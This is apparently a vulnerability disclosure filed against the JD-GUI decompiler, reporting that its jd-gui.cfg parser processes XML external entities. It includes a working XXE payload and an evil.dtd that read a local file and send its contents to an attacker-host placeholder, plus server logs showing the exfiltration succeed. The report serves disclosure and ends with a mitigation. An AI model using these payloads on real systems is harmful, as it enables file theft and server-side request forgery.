[Security] - XXE leads to SSRF/File Disclosure

[3sjay]

XXE leads to SSRF/File Disclosure

This is not a critical security issue in my opinion as it is quite a contrived scenario. Just observed the behaviour and wanted to have it out of my mind.

Due to the way the jd-gui.cfg file is parsed allows for SSRF or File Disclosure attacks due to processing of XML external entities. The main issues are:

• When parsing jd-gui.cfg files it follows external entities
• Current working dir is used on $nix based systems

Attack idea

Place a jd-gui.cfg file within the file locations of .jars to trigger the vulnerability.

Attack Setup

Follow the outlined steps within the same dir:

1. echo -n testcontent>test # file to be extracted
2. Create the following jd-gui.cfg file:

   <?xml version="1.0" encoding="ISO-8859-1"?>
   <!DOCTYPE data [
   <!ENTITY % file SYSTEM
   "file:///<path/to/current_working_dir>/test">
   <!ENTITY % dtd SYSTEM
   "http://<attacker-host>:8000/evil.dtd">
   %dtd;
   ]>
   <data>&send;</data>

3. Replace the value <attacker-host> with your attacking host. Also replace the <path/to/current_working_dir> with your CWD
4. Create the evil.dtd file:

   <!ENTITY % all "<!ENTITY send SYSTEM 'http://<attacker-host>:8000/?collect=%file;'>">
   %all;

5. Replace the value <attacker-host> again to match your host machine
6. Start python Webserver python3 -m http.server
7. Last step, start jd-gui.jar e.g. java -jar ~/Downloads/jd-gui.jar 8.

Result:

esjay@machine jd-gui % python3 -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
<snip> "GET /evil.dtd HTTP/1.1" 200 -
<snip> "GET /?collect=testcontent HTTP/1.1" 200 -

Some Notes:

• It is only possible to extract file which don't include newlines.
• Arbitrary GET requests can be made also.

Recommendations

• Disable XML External Entities: OWASP Cheatsheet